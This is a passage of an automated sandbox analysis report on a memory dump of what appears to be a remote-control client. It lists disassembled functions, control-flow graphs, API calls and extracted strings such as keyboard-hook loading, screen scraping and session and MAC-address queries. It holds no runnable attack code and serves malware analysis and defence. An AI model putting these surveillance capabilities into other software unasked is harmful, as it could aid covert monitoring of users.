                                                                                    • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                    • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                    • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                    • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                    • API String ID: 263027137-1001504656
                                                                                    • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                    • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                    • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                    • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65
                                                                                    Function 1102DBC9 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1985 1102dbc9 1986 1102dbd0-1102dbe1 1985->1986 1986->1986 1987 1102dbe3 1986->1987 1988 1102dd24-1102dd3d call 11142ac0 1987->1988 1991 1102dd43-1102dd45 1988->1991 1992 1102dbc0-1102dbc3 1988->1992 1993 1102de43-1102de5d call 111463d0 1991->1993 1994 1102dd4b-1102dd51 1991->1994 1995 1102dbc5-1102dbc7 1992->1995 1996 1102dbe8-1102dbf1 1992->1996 2014 1102deb3-1102debf call 1102b4f0 1993->2014 2015 1102de5f-1102de78 call 1105dd10 1993->2015 1997 1102dd53-1102dd62 call 11144dc0 1994->1997 1998 1102dd68-1102dd78 1994->1998 1995->1986 1996->1988 1999 1102dbf7-1102dbfe 1996->1999 1997->1998 2003 1102dd7a 1998->2003 2004 1102dd7f-1102dd9d call 1102cc10 1998->2004 1999->1988 2005 1102dcf3-1102dd08 call 11162de7 1999->2005 2006 1102dc05-1102dc07 1999->2006 2007 1102dd0a-1102dd1f call 11162de7 1999->2007 2008 1102dc9a-1102dccd call 111618c1 call 11142290 1999->2008 2009 1102dcdb-1102dcf1 call 11164010 1999->2009 2010 1102dc8b-1102dc95 1999->2010 2011 1102dccf-1102dcd9 1999->2011 2012 1102dc4c-1102dc52 1999->2012 2013 1102dc7c-1102dc86 1999->2013 2003->2004 2004->1993 2037 1102dda3-1102ddc8 call 110b7920 call 11146450 2004->2037 2005->1988 2006->1988 2024 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 2006->2024 2007->1988 2008->1988 2009->1988 2010->1988 2011->1988 2017 1102dc54-1102dc68 call 11162de7 2012->2017 2018 1102dc6d-1102dc77 2012->2018 2013->1988 2040 1102dec1-1102dec8 2014->2040 2041 1102de98-1102de9f 2014->2041 2015->2014 2044 1102de7a-1102de8c 2015->2044 2017->1988 2018->1988 2024->1988 2071 1102ddd3-1102ddd9 2037->2071 2072 1102ddca-1102ddd1 2037->2072 2047 1102dea5-1102dea8 2040->2047 2050 1102deca-1102ded4 2040->2050 2041->2047 2048 1102e0aa-1102e0cb GetComputerNameA 2041->2048 2044->2014 2060 1102de8e 2044->2060 2056 1102deaa-1102deb1 call 110b7920 2047->2056 2057 1102ded9 2047->2057 2054 1102e103-1102e109 2048->2054 2055 1102e0cd-1102e101 call 11027c30 2048->2055 2050->2048 2064 1102e10b-1102e110 2054->2064 2065 1102e13f-1102e152 call 11164010 2054->2065 2055->2054 2088 1102e157-1102e163 2055->2088 2063 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 2056->2063 2057->2063 2060->2041 2122 1102e07a-1102e082 SetLastError 2063->2122 2123 1102dfbc-1102dfd3 2063->2123 2070 1102e116-1102e11a 2064->2070 2083 1102e347-1102e36a 2065->2083 2078 1102e136-1102e138 2070->2078 2079 1102e11c-1102e11e 2070->2079 2074 1102dddb-1102dde2 call 11027d60 2071->2074 2075 1102de39 2071->2075 2072->1993 2074->2075 2092 1102dde4-1102de16 2074->2092 2075->1993 2081 1102e13b-1102e13d 2078->2081 2085 1102e132-1102e134 2079->2085 2086 1102e120-1102e126 2079->2086 2081->2065 2081->2088 2096 1102e392-1102e39a 2083->2096 2097 1102e36c-1102e372 2083->2097 2085->2081 2086->2078 2087 1102e128-1102e130 2086->2087 2087->2070 2087->2085 2093 1102e165-1102e17a call 110b7920 call 11029bd0 2088->2093 2094 1102e17c-1102e18f call 11081a70 2088->2094 2113 1102de20-1102de2f call 110f6080 2092->2113 2114 1102de18-1102de1e 2092->2114 2127 1102e1d3-1102e1ec call 11081a70 2093->2127 2111 1102e191-1102e1b4 2094->2111 2112 1102e1b6-1102e1b8 2094->2112 2103 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 2096->2103 2104 1102e39c-1102e3a9 call 11035dd0 call 111618c1 2096->2104 2097->2096 2101 1102e374-1102e38d call 1102d330 2097->2101 2101->2096 2104->2103 2111->2127 2117 1102e1c0-1102e1d1 2112->2117 2118 1102de32-1102de34 call 1102d330 2113->2118 2114->2113 2114->2118 2117->2117 2117->2127 2118->2075 2129 1102e043-1102e04f 2122->2129 2123->2129 2144 1102dfd5-1102dfde 2123->2144 2147 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 2127->2147 2148 1102e32c-1102e339 call 11164010 2127->2148 2135 1102e092-1102e0a1 2129->2135 2136 1102e051-1102e05d 2129->2136 2135->2048 2142 1102e0a3-1102e0a4 FreeLibrary 2135->2142 2139 1102e06f-1102e073 2136->2139 2140 1102e05f-1102e06d GetProcAddress 2136->2140 2149 1102e084-1102e086 SetLastError 2139->2149 2150 1102e075-1102e078 2139->2150 2140->2139 2142->2048 2144->2129 2145 1102dfe0-1102e016 call 11146450 call 1112b270 2144->2145 2145->2129 2168 1102e018-1102e03e call 11146450 call 11027920 2145->2168 2185 1102e283-1102e299 call 11128ec0 2147->2185 2186 1102e26f-1102e27e call 11029450 2147->2186 2164 1102e33c-1102e341 CharUpperA 2148->2164 2152 1102e08c 2149->2152 2150->2152 2152->2135 2164->2083 2168->2129 2190 1102e2b2-1102e2ec call 110d0bd0 * 2 2185->2190 2191 1102e29b-1102e2ad call 110d0bd0 2185->2191 2186->2185 2198 1102e302-1102e32a call 11164010 call 110d07c0 2190->2198 2199 1102e2ee-1102e2fd call 11029450 2190->2199 2191->2190 2198->2164 2199->2198
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: $14/03/16 10:38:31 V12.10F8$364339$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                    • API String ID: 1029625771-4278707901
                                                                                    • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                    • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                    • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                    • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51
                                                                                    Function 111414A0 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266libraryregistryloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2205 111414a0-111414e1 call 11146450 2208 111414e7-11141543 LoadLibraryA 2205->2208 2209 11141569-11141593 call 11142e80 call 11146ee0 LoadLibraryA 2205->2209 2210 11141545-11141550 call 11017450 2208->2210 2211 11141557-11141560 2208->2211 2220 11141595-1114159b 2209->2220 2221 111415c3 2209->2221 2210->2211 2219 11141552 call 110cc7f0 2210->2219 2211->2209 2214 11141562-11141563 FreeLibrary 2211->2214 2214->2209 2219->2211 2220->2221 2223 1114159d-111415a3 2220->2223 2224 111415cd-111415ed GetClassInfoExA 2221->2224 2223->2221 2225 111415a5-111415c1 call 1105dd10 2223->2225 2226 111415f3-1114161a call 11161d20 call 111444b0 2224->2226 2227 1114168e-111416e6 2224->2227 2225->2224 2236 11141633-11141675 call 111444b0 call 111444e0 LoadCursorA GetStockObject RegisterClassExA 2226->2236 2237 1114161c-11141630 call 11029450 2226->2237 2238 11141722-11141728 2227->2238 2239 111416e8-111416ee 2227->2239 2236->2227 2263 11141677-1114168b call 11029450 2236->2263 2237->2236 2241 11141764-11141786 call 1105dd10 2238->2241 2242 1114172a-11141739 call 1110f420 2238->2242 2239->2238 2244 111416f0-111416f6 2239->2244 2258 11141794-11141799 2241->2258 2259 11141788-11141792 2241->2259 2256 1114175d 2242->2256 2257 1114173b-1114175b 2242->2257 2244->2238 2246 111416f8-1114170f call 1112c830 LoadLibraryA 2244->2246 2246->2238 2262 11141711-1114171d GetProcAddress 2246->2262 2264 1114175f 2256->2264 2257->2264 2260 111417a5-111417ab 2258->2260 2261 1114179b 2258->2261 2259->2260 2265 111417ad-111417b3 call 110f7d00 2260->2265 2266 111417b8-111417d1 call 1113cd80 2260->2266 2261->2260 2262->2238 2263->2227 2264->2241 2265->2266 2273 111417d7-111417dd 2266->2273 2274 11141879-1114188a 2266->2274 2275 111417df-111417f1 call 1110f420 2273->2275 2276 11141819-1114181f 2273->2276 2287 111417f3-11141809 call 1115d6d0 2275->2287 2288 1114180b 2275->2288 2277 11141845-11141851 2276->2277 2278 11141821-11141827 2276->2278 2282 11141853-11141859 2277->2282 2283 11141868-11141873 #17 LoadLibraryA 2277->2283 2280 1114182e-11141840 SetTimer 2278->2280 2281 11141829 call 11134930 2278->2281 2280->2277 2281->2280 2282->2283 2286 1114185b-11141861 2282->2286 2283->2274 2286->2283 2290 11141863 call 1112d6a0 2286->2290 2289 1114180d-11141814 2287->2289 2288->2289 2289->2276 2290->2283
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                    • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                    • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                    • _memset.LIBCMT ref: 111415F9
                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                    • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                    • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                    • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                    • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                    • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                    • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                    • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                      • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,420B7E12,1102FCB2,00000000), ref: 1101747E
                                                                                      • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                      • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                      • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                      • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                      • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                    • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                    • API String ID: 3706574701-3145203681
                                                                                    • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                    • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                    • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                    • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55
                                                                                    Function 110285F0 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2294 110285f0-1102860d 2295 11028613-11028642 2294->2295 2296 11028cd8-11028cdf 2294->2296 2297 110286d0-11028718 GetModuleFileNameA call 111631f0 call 11163fed 2295->2297 2298 11028648-1102864e 2295->2298 2299 11028cf1-11028cf5 2296->2299 2300 11028ce1-11028cea 2296->2300 2314 1102871d 2297->2314 2302 11028650-11028658 2298->2302 2304 11028cf7-11028d09 call 11161d01 2299->2304 2305 11028d0a-11028d1e call 11161d01 2299->2305 2300->2299 2303 11028cec 2300->2303 2302->2302 2308 1102865a-11028660 2302->2308 2303->2299 2312 11028663-11028668 2308->2312 2312->2312 2315 1102866a-11028674 2312->2315 2316 11028720-1102872a 2314->2316 2317 11028691-11028697 2315->2317 2318 11028676-1102867d 2315->2318 2320 11028730-11028733 2316->2320 2321 11028ccf-11028cd7 2316->2321 2319 11028698-1102869e 2317->2319 2322 11028680-11028686 2318->2322 2319->2319 2323 110286a0-110286ce call 11163fed 2319->2323 2320->2321 2324 11028739-11028747 call 11026890 2320->2324 2321->2296 2322->2322 2325 11028688-1102868e 2322->2325 2323->2316 2330 11028c55-11028c6a call 11163db7 2324->2330 2331 1102874d-11028760 call 11162de7 2324->2331 2325->2317 2330->2321 2338 11028c70-11028cca 2330->2338 2336 11028762-11028765 2331->2336 2337 1102876b-11028793 call 11026700 call 11026890 2331->2337 2336->2330 2336->2337 2337->2330 2343 11028799-110287b6 call 11026980 call 11026890 2337->2343 2338->2321 2348 11028bc5-11028bcc 2343->2348 2349 110287bc 2343->2349 2350 11028bf2-11028bf9 2348->2350 2351 11028bce-11028bd1 2348->2351 2352 110287c0-110287e0 call 11026700 2349->2352 2354 11028c11-11028c18 2350->2354 2355 11028bfb-11028c01 2350->2355 2351->2350 2353 11028bd3-11028bda 2351->2353 2362 110287e2-110287e5 2352->2362 2363 11028816-11028819 2352->2363 2357 11028be0-11028bf0 2353->2357 2359 11028c1a-11028c25 2354->2359 2360 11028c28-11028c2f 2354->2360 2358 11028c07-11028c0f 2355->2358 2357->2350 2357->2357 2358->2354 2358->2358 2359->2360 2364 11028c31-11028c3b 2360->2364 2365 11028c3e-11028c45 2360->2365 2366 110287e7-110287ee 2362->2366 2367 110287fe-11028801 2362->2367 2369 11028bae-11028bbf call 11026890 2363->2369 2370 1102881f-11028832 call 11164150 2363->2370 2364->2365 2365->2330 2368 11028c47-11028c52 2365->2368 2371 110287f4-110287fc 2366->2371 2367->2369 2372 11028807-11028811 2367->2372 2368->2330 2369->2348 2369->2352 2370->2369 2377 11028838-11028854 call 111646ce 2370->2377 2371->2367 2371->2371 2372->2369 2380 11028856-1102885c 2377->2380 2381 1102886f-11028885 call 111646ce 2377->2381 2383 11028860-11028868 2380->2383 2386 11028887-1102888d 2381->2386 2387 1102889f-110288b5 call 111646ce 2381->2387 2383->2383 2385 1102886a 2383->2385 2385->2369 2388 11028890-11028898 2386->2388 2392 110288b7-110288bd 2387->2392 2393 110288cf-110288e5 call 111646ce 2387->2393 2388->2388 2390 1102889a 2388->2390 2390->2369 2394 110288c0-110288c8 2392->2394 2398 110288e7-110288ed 2393->2398 2399 110288ff-11028915 call 111646ce 2393->2399 2394->2394 2396 110288ca 2394->2396 2396->2369 2401 110288f0-110288f8 2398->2401 2404 11028917-1102891d 2399->2404 2405 1102892f-11028945 call 111646ce 2399->2405 2401->2401 2402 110288fa 2401->2402 2402->2369 2406 11028920-11028928 2404->2406 2410 11028947-1102894d 2405->2410 2411 1102895f-11028975 call 111646ce 2405->2411 2406->2406 2408 1102892a 2406->2408 2408->2369 2412 11028950-11028958 2410->2412 2416 11028977-1102897d 2411->2416 2417 1102898f-110289a5 call 111646ce 2411->2417 2412->2412 2414 1102895a 2412->2414 2414->2369 2418 11028980-11028988 2416->2418 2422 110289a7-110289ad 2417->2422 2423 110289bf-110289d5 call 111646ce 2417->2423 2418->2418 2420 1102898a 2418->2420 2420->2369 2424 110289b0-110289b8 2422->2424 2428 110289d7-110289dd 2423->2428 2429 110289ef-11028a05 call 111646ce 2423->2429 2424->2424 2426 110289ba 2424->2426 2426->2369 2431 110289e0-110289e8 2428->2431 2434 11028a07-11028a0d 2429->2434 2435 11028a1f-11028a35 call 111646ce 2429->2435 2431->2431 2433 110289ea 2431->2433 2433->2369 2436 11028a10-11028a18 2434->2436 2440 11028a37-11028a3d 2435->2440 2441 11028a4f-11028a65 call 111646ce 2435->2441 2436->2436 2438 11028a1a 2436->2438 2438->2369 2442 11028a40-11028a48 2440->2442 2446 11028a86-11028a9c call 111646ce 2441->2446 2447 11028a67-11028a6d 2441->2447 2442->2442 2444 11028a4a 2442->2444 2444->2369 2452 11028ab3-11028ac9 call 111646ce 2446->2452 2453 11028a9e 2446->2453 2449 11028a77-11028a7f 2447->2449 2449->2449 2450 11028a81 2449->2450 2450->2369 2458 11028ae0-11028af6 call 111646ce 2452->2458 2459 11028acb 2452->2459 2454 11028aa4-11028aac 2453->2454 2454->2454 2456 11028aae 2454->2456 2456->2369 2464 11028b17-11028b2d call 111646ce 2458->2464 2465 11028af8-11028afe 2458->2465 2460 11028ad1-11028ad9 2459->2460 2460->2460 2462 11028adb 2460->2462 2462->2369 2470 11028b4f-11028b65 call 111646ce 2464->2470 2471 11028b2f-11028b3f 2464->2471 2466 11028b08-11028b10 2465->2466 2466->2466 2468 11028b12 2466->2468 2468->2369 2476 11028b67-11028b6d 2470->2476 2477 11028b7c-11028b92 call 111646ce 2470->2477 2472 11028b40-11028b48 2471->2472 2472->2472 2474 11028b4a 2472->2474 2474->2369 2479 11028b70-11028b78 2476->2479 2477->2369 2482 11028b94-11028b9a 2477->2482 2479->2479 2481 11028b7a 2479->2481 2481->2369 2483 11028ba4-11028bac 2482->2483 2483->2369 2483->2483
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6F9C1370,?,0000001A), ref: 110286DD
                                                                                    • _strrchr.LIBCMT ref: 110286EC
                                                                                      • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileModuleName__stricmp_l_strrchr
                                                                                    • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                    • API String ID: 1609618855-357498123
                                                                                    • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                    • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                    • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                    • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52
                                                                                    Function 11086700 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2484 11086700-1108671d call 110866f0 2487 1108671f-1108672f call 11161d01 2484->2487 2488 11086730-11086740 call 11144bd0 2484->2488 2493 11086742-1108674a 2488->2493 2493->2493 2494 1108674c-11086752 2493->2494 2495 11086753-11086759 2494->2495 2495->2495 2496 1108675b-11086792 LoadLibraryA 2495->2496 2497 110867f9-1108680e GetProcAddress 2496->2497 2498 11086794-1108679b 2496->2498 2501 1108689c-110868ad call 11161d01 2497->2501 2502 11086814-11086823 GetProcAddress 2497->2502 2499 1108679d-110867ee GetModuleFileNameA call 11081b40 LoadLibraryA 2498->2499 2500 110867f0-110867f3 2498->2500 2499->2500 2500->2497 2500->2501 2502->2501 2504 11086825-11086834 GetProcAddress 2502->2504 2504->2501 2508 11086836-11086845 GetProcAddress 2504->2508 2508->2501 2509 11086847-11086856 GetProcAddress 2508->2509 2509->2501 2510 11086858-11086867 GetProcAddress 2509->2510 2510->2501 2511 11086869-11086878 GetProcAddress 2510->2511 2511->2501 2512 1108687a-11086889 GetProcAddress 2511->2512 2512->2501 2513 1108688b-1108689a GetProcAddress 2512->2513 2513->2501 2514 110868ae-110868c3 call 11161d01 2513->2514
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                    • LoadLibraryA.KERNEL32(?), ref: 110867EC
